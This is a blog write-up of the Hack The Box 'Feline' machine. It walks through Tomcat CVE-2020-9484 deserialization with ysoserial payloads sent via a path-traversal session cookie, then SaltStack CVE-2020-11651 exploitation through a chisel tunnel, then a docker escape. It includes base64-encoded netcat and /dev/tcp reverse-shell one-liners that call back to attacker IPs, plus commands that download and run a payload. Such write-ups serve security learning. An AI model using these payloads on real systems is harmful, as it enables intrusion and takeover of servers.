<!doctype html>
<html>
<head>
	<meta charset="utf-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>M4t35Z's Blog - basic edition</title>
	<link rel="stylesheet" type="text/css" href="//m4t3sz.gitlab.io/bsc/style.css"/>
</head>

<div id="header">
	<a id="headerLink" href="//m4t3sz.gitlab.io/bsc/">m4t3sz.gitlab.io/bsc</a>
	<span> - </span>
	<span id="headerSubtitle">M4t35Z's Blog - basic edition</span>
</div>
<hr />
<div id="menu">
	<a href="//m4t3sz.gitlab.io/"><b>home</b></a>
	<a href="//twitter.com/szilak44/">twitter</a>
	<a href="//github.com/matesz44/">github</a>
	<a href="//github.com/matesz44/dotfiles/">dotfiles</a>
	<a href="//github.com/matesz44/scripts/">scripts</a>
	<span class="right">
		<a href="//gitlab.com/m4t3sz/sites/">source</a>
	</span>
</div>
<hr />
<div id="content">
<div id="nav">
	<ul>
	<li><a href="/bsc">about</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/showcase/">showcase/</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/writeup/"><b>>writeup/</b></a>
		<ul>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/bug/">bug/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/">ctf/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/"><b>>htb/</b></a>
			<ul>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/buff/">buff/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/feline/"><b>>feline/</b></a>
				<ul>
				<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/feline/img/">img/</a></li>
				</ul>
			</li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/omni/">omni/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/openkeys/">openkeys/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/sneaky_mailer/">sneaky mailer/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/time/">time/</a></li>
			</ul>
		</li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/">thm/</a></li>
		</ul>
	</li>
	</ul>
</div>
<hr />
<div id="main">

<blockquote><p>2020.10.03</p>
</blockquote>
<h1>Box Information</h1>
<pre><code>Name:       | Feline
OS:         | Linux
Difficulty: | Hard
Points:     | 40
Release:    | 29 Aug 2020
IP:         | 10.10.10.205
</code></pre>
<h1>Recon</h1>
<h2>Nmap scan</h2>
<p>I ran nmap in order to discover the open ports on the target machine.</p>
<p>Nmap TCP:</p>
<pre><code>nmap -sC -sV -T4 -p- -oA scans/nmap.tcp 10.10.10.205
</code></pre>
<p>Output:</p>
<pre><code>Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 22:42 CEST
Nmap scan report for 10.10.10.205
Host is up (0.050s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Apache Tomcat 9.0.27
|_http-title: VirusBucket
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.67 seconds
</code></pre>
<p>Name: feline(some cat related stuff i found on ddg) -&gt; tomCAT</p>
<h2>http - TCP 8080</h2>
<p>It's an Apache tomcat server running a malware analysing webpage.</p>
<p><img src="img/mainpage.png" alt="mainpage" /></p>
<p>The analyser app is at <a href="http://10.10.10.205:8080/service">http://10.10.10.205:8080/service</a>:</p>
<p><img src="img/analyser.png" alt="analyser" /></p>
<ul>
<li>It needs an email and a file</li>
</ul>
<p>I gave it a random email <code>asd@asd.asd</code> and a file(my nmap scan).</p>
<p><img src="img/report_sent.png" alt="report_sent" /></p>
<p>I also intercepted this request(when I press the <strong>Analyze</strong> button):</p>
<p><img src="img/req_in_burp.png" alt="req_in_burp" /></p>
<ul>
<li>My file is in cleartext</li>
<li>It uploaded somewhere on the server</li>
</ul>
<h3>Producing errors</h3>
<p>I tried to tamper with the filename because when I selected my gobuster outputfile I got an error saying <strong>Invalid filename!</strong><br />
This was because of the <code>_</code> character. Any special chars that aren't a simple ASCII letter or a number are invalid except the dot(<code>.</code>) character.<br />
I deleted the whole filename and I got a verbosive error that leaked the path of the uploaded file on the system.
<ul>
<li>Note: also works with <code>filename=&quot;.&quot;</code></li>
</ul>
</p>
<p><img src="img/leaked_path.png" alt="leaked_path" />
<img src="img/leaked_path_dot.png" alt="leaked_path_dot" /></p>
<p>The request:</p>
<pre><code>POST /upload.jsp?email=asd HTTP/1.1
Host: 10.10.10.205:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.205:8080/service/
Content-Type: multipart/form-data; boundary=---------------------------8829612316902379741069123043
Origin: http://10.10.10.205:8080
Content-Length: 301
DNT: 1
Connection: close
Cookie: JSESSIONID=F7812E7DA7679F91E6AB8DBA5DCCCD9E

-----------------------------8829612316902379741069123043
Content-Disposition: form-data; name=&quot;image&quot;; filename=&quot;&quot;
Content-Type: application/octet-stream

/index.html (Status: 200)
/license.txt (Status: 200)
/script.js (Status: 200)

-----------------------------8829612316902379741069123043--
</code></pre>
<p>And the response:</p>
<pre><code>HTTP/1.1 200 
Set-Cookie: JSESSIONID=89212C9D2AEC62F6D002542CB05B1267; Path=/; HttpOnly
Content-Type: text/html;charset=UTF-8
Content-Length: 2867
Date: Sun, 30 Aug 2020 16:28:04 GMT
Connection: close







&lt;div id=&quot;error&quot;&gt;
java.io.FileNotFoundException: /opt/samples/uploads (Is a directory)
	at java.base/java.io.FileOutputStream.open0(Native Method)
	at java.base/java.io.FileOutputStream.open(FileOutputStream.java:298)
	at java.base/java.io.FileOutputStream.&lt;init&gt;(FileOutputStream.java:237)
	at java.base/java.io.FileOutputStream.&lt;init&gt;(FileOutputStream.java:187)
	at org.apache.commons.fileupload.disk.DiskFileItem.write(DiskFileItem.java:394)
	at org.apache.jsp.upload_jsp._jspService(upload_jsp.java:205)
	at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:741)
	at org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:476)
	at org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:385)
	at org.apache.jasper.servlet.JspServlet.service(JspServlet.java:329)
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:741)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:231)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:202)
	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96)
	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:526)
	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:139)
	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
	at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:678)
	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:74)
	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343)
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:408)
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:861)
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1579)
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
	at java.base/java.lang.Thread.run(Thread.java:834)
&lt;/div&gt;
</code></pre>
<ul>
<li><code>/opt/samples/uploads</code> was the leaked path</li>
</ul>
<h1>Java deserialization</h1>
<p>I found a <a href="https://www.synopsys.com/blogs/software-security/mitigate-java-deserialization-vulnerability-jboss/">good article</a> describing this vulnerability.</p>
<pre><code>java -jar /opt/ysoserial/ysoserial-master-6eca5bc740-1.jar CommonsCollections1 'ping 10.10.15.9' &gt; ./expl/deser1_ping
</code></pre>
<pre><code>tcpdump -i tun0 icmp
</code></pre>
<p>I pasted the previously created file to burp and sent the fileupload request but it didn't return anything.</p>
<p>It doesn't trigger the deserialization by default but there is a CVE out there.</p>
<p>I searched for <code>CVE trigger deserialization</code> in ddg and found one.</p>
<p><strong>CVE-2020-9484</strong></p>
<blockquote><p>When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.</p>
</blockquote>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-9484">https://nvd.nist.gov/vuln/detail/CVE-2020-9484</a><br />
which linked to <a href="https://seclists.org/fulldisclosure/2020/Jun/6">https://seclists.org/fulldisclosure/2020/Jun/6</a><br />
and this page linked to <a href="https://www.redtimmy.com/java-hacking/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/">https://www.redtimmy.com/java-hacking/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/</a> which has the stepts to exploit.</p>
<p><img src="img/cve-2020-9484_description.png" alt="cve-2020-9484_description" /></p>
<p>Uploaded filename must end with <code>.session</code> cuz the cookie puts a <code>.session</code> at the end of the filename</p>
<p>After some searching on java deserialization I found out it is recommended to encrypt my command using this page:<br />
<a href="http://www.jackson-t.ca/runtime-exec-payloads.html">http://www.jackson-t.ca/runtime-exec-payloads.html</a></p>
<h1>Exploitation</h1>
<ol start="0">
<li>Encode the command you want to run with <a href="http://www.jackson-t.ca/runtime-exec-payloads.html">http://www.jackson-t.ca/runtime-exec-payloads.html</a></li>
<li>Make the java serialized data file with <a href="https://github.com/frohoff/ysoserial">ysoserial</a> and name it as <code>&lt;something&gt;.session</code></li>
<li><strong>Use the webpage to upload the file</strong> (otherwise with curl or burp it will be in a wrong format)!</li>
<li><strong>CVE-2020-9484</strong> ==&gt; Make a request with the <strong>custom cookie</strong></li>
<li>The file gets deserialized and the command gets executed</li>
</ol>
<h2>Encoding the command</h2>
<p>I used <code>ping -c 1 10.10.15.9</code> as my command I wanted to run. I pasted to <a href="http://www.jackson-t.ca/runtime-exec-payloads.html">http://www.jackson-t.ca/runtime-exec-payloads.html</a>.</p>
<p><img src="img/ping_encoded.png" alt="ping_encoded" /></p>
<pre><code>bash -c {echo,cGluZyAtYyAxIDEwLjEwLjE1Ljk=}|{base64,-d}|{bash,-i}
</code></pre>
<h2>Making the exploit file</h2>
<p>I used <a href="https://github.com/frohoff/ysoserial">ysoserial</a> to make the serialized java file.
<ul>
<li>Note: I used the <code>CommonsCollections4</code> payload type</li>
</ul>
</p>
<pre><code>java -jar /opt/ysoserial/ysoserial-master-6eca5bc740-1.jar CommonsCollections4 'bash -c {echo,cGluZyAtYyAxIDEwLjEwLjE1Ljk=}|{base64,-d}|{bash,-i}' &gt; sess.session
</code></pre>
<p>Now I have the exploit file:</p>
<pre><code>$ file sess.session
sess.session: Java serialization data, version 5
</code></pre>
<h2>Uploading the file</h2>
<p>I used the webpage to upload my exploit file.</p>
<p><a href="http://10.10.10.205:8080/service/">http://10.10.10.205:8080/service/</a></p>
<p>I selected my sess.session file and hit <strong>Analyze!</strong></p>
<p><img src="img/deser_exploit_uploaded.png" alt="deser_exploit_uploaded" /></p>
<h2>CVE-2020-9484</h2>
<p>I started a listener for icmp packets with <code>tcpdump</code>.</p>
<pre><code>tcpdump -i tun0 icmp
</code></pre>
<p>Now I made the request in order to deserialize the uploaded file and get command execution.</p>
<pre><code>curl -H &quot;Cookie: JSESSIONID=../../../../../../../../../../../../opt/samples/uploads/sess&quot; feline.htb:8080/upload.jsp -v
</code></pre>
<p>I got a <strong>HTTP 500 - Internal Server Error</strong> which means my file got deserialized and it ran:</p>
<p><img src="img/internal_server_error.png" alt="internal_server_error" /></p>
<p>And I also got the ping:</p>
<p><img src="img/ping_success.png" alt="ping_success" /></p>
<pre><code>$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
13:45:50.032667 IP feline.htb &gt; 10.10.15.9: ICMP echo request, id 2, seq 1, length 64
13:45:50.032713 IP 10.10.15.9 &gt; feline.htb: ICMP echo reply, id 2, seq 1, length 64
</code></pre>
<ul>
<li>This means I have an RCE</li>
</ul>
<p>I just changed my initial command to a reverse shell 1 liner and did the steps again.</p>
<pre><code>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.15.9 1337 &gt;/tmp/f
bash -c {echo,cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTAuMTUuOSAxMzM3ID4vdG1wL2Y=}|{base64,-d}|{bash,-i}

java -jar /opt/ysoserial/ysoserial-master-6eca5bc740-1.jar CommonsCollections4 'bash -c {echo,cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTAuMTUuOSAxMzM3ID4vdG1wL2Y=}|{base64,-d}|{bash,-i}' &gt; sess.session

---UPLOADED TO THE PAGE---

nc -lvnp 1337

curl -H &quot;Cookie: JSESSIONID=../../../../../../../../../../../../opt/samples/uploads/sess&quot; feline.htb:8080/upload.jsp
</code></pre>
<p><img src="img/gotuser_tomcat.png" alt="gotuser_tomcat" /></p>
<ul>
<li>Note: I had access to the user flag(<code>/home/tomcat/user.txt:5bfc6f02bdc653f03b262a9473506447</code>)</li>
</ul>
<h1>Privilege Escalation</h1>
<p>As always I made my shell a tty with python.</p>
<pre><code>python3 -c 'import pty;pty.spawn(&quot;/bin/bash&quot;)'
</code></pre>
<h2>Linpeas</h2>
<pre><code>VirusBucket
127.0.0.1 localhost
127.0.1.1 ubuntu VirusBucket

docker0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        inet6 fe80::42:aeff:fe65:a7db  prefixlen 64  scopeid 0x20&lt;link&gt;
        ether 02:42:ae:65:a7:db  txqueuelen 0  (Ethernet)
        RX packets 41  bytes 3881 (3.8 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 69 

veth73a46fa: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500
        inet6 fe80::34c9:78ff:fe2f:8377  prefixlen 64  scopeid 0x20&lt;link&gt;
        ether 36:c9:78:2f:83:77  txqueuelen 0  (Ethernet)
        RX packets 41  bytes 4455 (4.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 90  bytes 8838 (8.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

172.17.0.0      0.0.0.0         255.255.0.0     U     0      0        0 docker0
172.18.0.0      0.0.0.0         255.255.0.0     U     0      0        0 br-e9220f64857c
</code></pre>
<ul>
<li>There is docker running!</li>
</ul>
<pre><code>[+] Iptables rules
*filter
:INPUT ACCEPT [51:3576]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [27:2412]
COMMIT
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT
</code></pre>
<pre><code>tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:41559         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:4505          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:4506          0.0.0.0:*               LISTEN      -
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      945/java
udp        0      0 127.0.0.1:34373         127.0.0.53:53           ESTABLISHED -
</code></pre>
<ul>
<li>4505 and 4506 are interesting</li>
<li>I went to the <a href="https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers">ports wikipedia page</a> and found out these ports are for <a href="https://en.wikipedia.org/wiki/Salt_(software)">Salt</a>.</li>
</ul>
<pre><code>[+] Writable folders configured in /etc/ld.so.conf.d/
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#etc-ld-so-conf-d
/usr/local/lib
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
</code></pre>
<pre><code>/usr/bin/rescan-scsi-bus.sh
</code></pre>
<pre><code>[+] Writable log files (logrotten) (limit 100)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation
Writable: /opt/tomcat/logs/localhost.2020-07-20.log
Writable: /opt/tomcat/logs/catalina.2020-08-26.log
Writable: /opt/tomcat/logs/catalina.2020-07-20.log
Writable: /opt/tomcat/logs/localhost.2020-06-17.log
</code></pre>
<pre><code>$ ps aux
---[SNIP]---
tomcat      3638  0.0  0.0    524     4 pts/0    S+   08:10   0:00 ./socat TCP-LISTEN:4506,reuseaddr,reuseport,fork,bind=10.10.10.205 TCP:127.0.0.1:4506
---[SNIP]---
</code></pre>
<ul>
<li>This is a port forwarding with socat (maybe for the docker container)</li>
</ul>
<h2>Salt explolit</h2>
<p>I searched for <code>salt</code> in exploitdb and there were an RCE one.</p>
<p><img src="img/exploitdbsearch_salt.png" alt="exploitdbsearch_salt" /></p>
<p><a href="https://www.exploit-db.com/exploits/48421">exploit-db.com/exploits/48421</a></p>
<ul>
<li>This is for both <code>CVE-2020-11652</code> and <code>CVE-2020-11651</code></li>
</ul>
<p>The source of this exploit is <a href="https://github.com/jasperla/CVE-2020-11651-poc">github.com/jasperla/CVE-2020-11651-poc</a>.</p>
<p>I cloned the repo:</p>
<pre><code>https://github.com/jasperla/CVE-2020-11651-poc
</code></pre>
<ul>
<li>The python file requires the <code>salt</code> package so I installed it with pip:</li>
</ul>
<pre><code>python3 -m pip install salt
</code></pre>
<p>I ran the exploit with the help flag in order to get the correct syntax:</p>
<pre><code>$ python3 exploit.py -h
usage: exploit.py [-h] [--master MASTER_IP] [--port MASTER_PORT] [--force] [--debug]
                  [--run-checks] [--read READ_FILE] [--upload-src UPLOAD_SRC]
                  [--upload-dest UPLOAD_DEST] [--exec EXEC] [--exec-all EXEC_ALL]

Saltstack exploit for CVE-2020-11651 and CVE-2020-11652

optional arguments:
  -h, --help            show this help message and exit
  --master MASTER_IP, -m MASTER_IP
  --port MASTER_PORT, -p MASTER_PORT
  --force, -f
  --debug, -d
  --run-checks, -c
  --read READ_FILE, -r READ_FILE
  --upload-src UPLOAD_SRC
  --upload-dest UPLOAD_DEST
  --exec EXEC           Run a command on the master
  --exec-all EXEC_ALL   Run a command on all minions
</code></pre>
<p>Since these <em>Salt</em> ports are opened to <strong>only localhost</strong> I must forward them to my machine to be able to run the exploit on them.</p>
<h3>Reverse Port Tunneling with chisel</h3>
<h4>Downloading chisel</h4>
<p><a href="https://github.com/jpillora/chisel">github.com/jpillora/chisel</a></p>
<ul>
<li>I went to the <strong>Releases</strong> page and downloaded the binary for linux amd64 (<code>chisel_1.7.1_linux_amd64.gz</code>).</li>
</ul>
<p>I downloaded, extracted and gave it permissions to be executable:</p>
<pre><code>wget https://github.com/jpillora/chisel/releases/download/v1.7.1/chisel_1.7.1_linux_amd64.gz
gunzip chisel_1.7.1_linux_amd64.gz
chmod +x chisel_1.7.1_linux_amd64
</code></pre>
<p>I also uploaded to the target(feline) box with the use of python http server and wget and I also made it executable with chmod.</p>
<pre><code>(attacker)$ sudo python3 -m http.server 80
</code></pre>
<pre><code>(victim)$ cd /tmp
(victim)$ wget 10.10.14.33/chisel_1.7.1_linux_amd64
(victim)$ chmod +x chisel_1.7.1_linux_amd64
</code></pre>
<p><img src="img/chisel_uploaded.png" alt="chisel_uploaded" /></p>
<h4>Running chisel</h4>
<p>On my attacker box I ran chisel in <strong>server mode</strong>:</p>
<pre><code>(attacker)$ ./chisel_1.7.1_linux_amd64 server --port 6969 --reverse
</code></pre>
<pre><code>
(victim)$ ./chisel_1.7.1_linux_amd64 client 10.10.14.33:6969 R:127.0.0.1:4506
</code></pre>
<ul>
<li>I got the connection!</li>
</ul>
<p><img src="img/chisel_connected.png" alt="chisel_connected" /></p>
<h3>Exploitation</h3>
<p>I ran the exploit script by providing the tunelled port and localhost as ip.</p>
<pre><code>(attacker)$ python3 exploit.py --master 127.0.0.1 --port 4506
</code></pre>
<p><img src="img/exploit_test.png" alt="exploit_test" /></p>
<p>Output:</p>
<pre><code>[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
[+] Checking salt-master (127.0.0.1:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: fXRBuks0FWHNXFsUQZFbd9KOJ7ra2JoH+wwNjeODAVB0qxeLWXR9FeE6rzeIp7T9vJuCX+QbJsk=
</code></pre>
<ul>
<li>The exploit successfully ran</li>
</ul>
<p>Now, I need a reverse shell. I made a file <code>revs.sh</code> which contained a reverse shell one-liner.</p>
<p><code>revs.sh</code>:</p>
<pre><code class="language-sh">bash -c 'bash -i &gt;&amp; /dev/tcp/10.10.14.33/1338 0&gt;&amp;1'
</code></pre>
<p>I made it executable.</p>
<pre><code>chmod +x revs.sh
</code></pre>
<h4>Downloading and executing the revshell 1liner</h4>
<p>Now, I need to download my revs.sh file to the box then execute it.</p>
<p>I hosted a python http.server in directory where revs.sh is.</p>
<pre><code>sudo python3 -m http.server 80
</code></pre>
<p>Then I ran the exploit with a <code>--exec</code> flag.</p>
<pre><code>python3 exploit.py --master 127.0.0.1 --exec &quot;wget 10.10.14.33/revs.sh -O /tmp/revs.sh&quot;
</code></pre>
<ul>
<li>I got the GET request in the http.server console which means the file was downloaded</li>
</ul>
<p>Now I should make it executable then ran it while I'm listening with nc.</p>
<pre><code>python3 exploit.py --master 127.0.0.1 --exec &quot;chmod +x /tmp/revs.sh&quot;
</code></pre>
<pre><code>rlwrap nc -lvnp 1338
</code></pre>
<pre><code>python3 exploit.py --master 127.0.0.1 --exec &quot;bash /tmp/revs.sh&quot;
</code></pre>
<p>I got the reverse shell connection!</p>
<pre><code>root@2d24bf61767c:~# hostname;id
hostname;id
2d24bf61767c
uid=0(root) gid=0(root) groups=0(root)
</code></pre>
<p><img src="img/got_docker_root.png" alt="got_docker_root" /></p>
<h1>Privilege Escalation from docker root</h1>
<h2>Enumeration</h2>
<pre><code>root@2d24bf61767c:~# ls -la
ls -la
total 144
drwx------ 1 root root  4096 Oct  3 09:56 .
drwxr-xr-x 1 root root  4096 Jun 30 12:33 ..
-rw------- 1 root root  1353 Oct  3 10:07 .bash_history
-rw-r--r-- 1 root root   570 Jan 31  2010 .bashrc
-rw-r--r-- 1 root root   148 Aug 17  2015 .profile
drwxr-xr-x 1 root root  4096 Oct  3 08:46 .ssh
-rwxr-xr-x 1 root root 35520 Oct  3 07:21 nc
-rw-r--r-- 1 root root 35520 Oct  3 07:21 nc.1
-rwxr-xr-x 1 root root 35520 Oct  3 03:51 netcat
-rw-r--r-- 1 root root    52 Oct  3 09:45 revs.sh
-rw-r--r-- 1 root root   137 Jun 30 12:41 todo.txt
</code></pre>
<pre><code>root@2d24bf61767c:~# cat .bash_history
cat .bash_history
paswd
passwd
passwd
passswd
passwd
passwd
cd /root
ls
ls -la
rm .wget-hsts
cd .ssh/
ls
cd ..
printf '- Add saltstack support to auto-spawn sandbox dockers.\n- Integrate changes to tomcat and make the service open to public.' &gt; todo.txt
cat todo.txt
printf -- '- Add saltstack support to auto-spawn sandbox dockers.\n- Integrate changes to tomcat and make the service open to public.' &gt; todo.txt
cat todo.txt
printf -- '- Add saltstack support to auto-spawn sandbox dockers.\n- Integrate changes to tomcat and make the service open to public.\' &gt; todo.txt
printf -- '- Add saltstack support to auto-spawn sandbox dockers.\n- Integrate changes to tomcat and make the service open to public.\n' &gt; todo.txt
printf -- '- Add saltstack support to auto-spawn sandbox dockers.\n- Integrate changes to tomcat and make the service open to public.\' &gt; todo.txt
printf -- '- Add saltstack support to auto-spawn sandbox dockers.\n- Integrate changes to tomcat and make the service open to public.\n' &gt; todo.txt
cat todo.txt
printf -- '- Add saltstack support to auto-spawn sandbox dockers through events.\n- Integrate changes to tomcat and make the service open to public.\n' &gt; todo.txt
cd /home/tomcat
cat /etc/passwd
exit
cd /root/
ls
cat todo.txt
ls -la /var/run/
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
exit
hostname;id
exit
</code></pre>
<ul>
<li>There is an interesting line</li>
</ul>
<pre><code>curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
</code></pre>
<pre><code>root@2d24bf61767c:~# cat todo.txt
cat todo.txt
- Add saltstack support to auto-spawn sandbox dockers through events.
- Integrate changes to tomcat and make the service open to public.
</code></pre>
<ul>
<li>The container name is maybe <code>sandbox</code></li>
</ul>
<p>I can try to execute it inside this docker container with root mounted.
<ul>
<li>But there is no docker binary in the container so I must transfer it somehow</li>
</ul>
</p>
<p>I opened a new revshell as user tomcat(sess file upload --&gt; req cookie).</p>
<pre><code>(tomcat)$ python3 -m http.server 8888 --dir /usr/bin &amp;
</code></pre>
<p>I used <code>ip a</code> to get the docker ip of the host. Then I used wget to download the docker binary to the container.</p>
<pre><code>(docker)$ wget 172.17.0.1:8888/docker
(docker)$ chmod +x docker
</code></pre>
<p>Then I ran the container again inside itself mounting /root to /mnt.</p>
<pre><code>(docker)$ python3 -c 'import pty; pty.spawn(&quot;/bin/bash&quot;)'
(docker)$ ./docker run -v /root:/mnt -it sandbox
</code></pre>
<p><img src="img/gotuser_root.png" alt="gotuser_root" /></p>
<ul>
<li>I got root on the main box with these nested dockers</li>
<li>I got the root flag too (<code>/mnt/root.txt:be6c5ff296277cb40e645ec3294dc974</code>)</li>
</ul>
<h1>Takeaways</h1>
<ul>
<li>If u see java errors(stack trace) go and try out java deserialization</li>
<li>Encrpyt your deserialisation payload with <a href="http://www.jackson-t.ca/runtime-exec-payloads.html">www.jackson-t.ca/runtime-exec-payloads.html</a></li>
<li>Always search for ports in the wiki (<a href="https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers">en.wikipedia.org/wiki/List<em>of</em>TCP<em>and</em>UDP<em>port</em>numbers</a>)</li>
<li>Always search in exploitdb</li>
<li>And use github for searching for PoCs</li>
<li>Docker is usually vulnerable in a boot2root CTF environment</li>
<li>If you have both user on the main box and docker root in the container try spawning a nested container by firstly copying the docker binary to the docker container then try creating a new nested container which mounts /root to /mnt</li>
</ul>
</div>

</div>

<hr /><hr />
<footer>
	<p>Author: M4t35Z</p>
	<p><a href="https://www.buymeacoffee.com/m4t35z">Support the creator (buymeacoffee)</a></p>
	<p><i>Created with <a href="https://github.com/karlb/smu/">smu</a> + <a href="https://git.suckless.org/sites/">suckless style</a></i></p>
</footer>
</html>
